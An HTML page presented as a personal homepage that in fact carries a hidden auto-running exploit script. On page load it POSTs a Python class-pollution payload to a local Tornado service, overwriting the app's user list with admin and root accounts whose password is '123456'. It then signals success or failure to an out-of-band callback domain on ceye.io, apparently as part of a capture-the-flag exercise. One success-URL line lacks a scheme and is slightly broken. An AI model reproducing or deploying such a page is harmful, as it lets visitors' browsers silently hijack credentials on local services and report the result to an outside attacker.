<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>sky-tears</title>
</head>
<body>
    <h1>sky-tears的个人主页</h1>
    <h1>Hello ~</h1>
    <script>
    var payload = {
    "__class__": {
        "__init__": {
            "__globals__": {
                "USERS": [
                    {
                        "username": "admin",
                        "password": "123456"
                    },
                    {
                        "username": "root",
                        "password": "123456"
                    }
                ]
            }
        }
    },
    "machine_id":"host-3930"
};
    fetch('https://127.0.0.1:48618/update_tornado', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/json', // 设置请求头
    },
    body: JSON.stringify(payload) // 请求体
})
    .then(response => {
        if (!response.ok) {
            throw new Error('Network response was not ok');
        }
        return response.json();
    })
    .then(data => {
        var a_get = "success" + ".6wox8c.ceye.io";
        // 在 POST 请求失败后发送 GET 请求
        return fetch(a_get, {
            method: 'GET',
            headers: {
                'Accept': 'application/json', // 设置请求头
            }
        })
            .then(response => {
                if (!response.ok) {
                    throw new Error(`HTTP error in fallback GET request! status: ${response.status}`);
                }
                return response.json();
            })
            .then(data => console.log('Fallback GET response:', data)) // 处理 GET 请求响应
            .catch(error => console.error('Error in fallback GET request:', error)); // 捕获 GET 请求错误
    }) // 正常处理响应
    .catch(error => {
        console.error('Error in POST request:', error); // 捕获 POST 请求错误

        // 在 POST 请求失败后发送 GET 请求
        return fetch('https://error.6wox8c.ceye.io/api', {
            method: 'GET',
            headers: {
                'Accept': 'application/json', // 设置请求头
            }
        })
            .then(response => {
                if (!response.ok) {
                    throw new Error(`HTTP error in fallback GET request! status: ${response.status}`);
                }
                return response.json();
            })
            .then(data => console.log('Fallback GET response:', data)) // 处理 GET 请求响应
            .catch(error => console.error('Error in fallback GET request:', error)); // 捕获 GET 请求错误
    });

    </script>
</body>
</html>
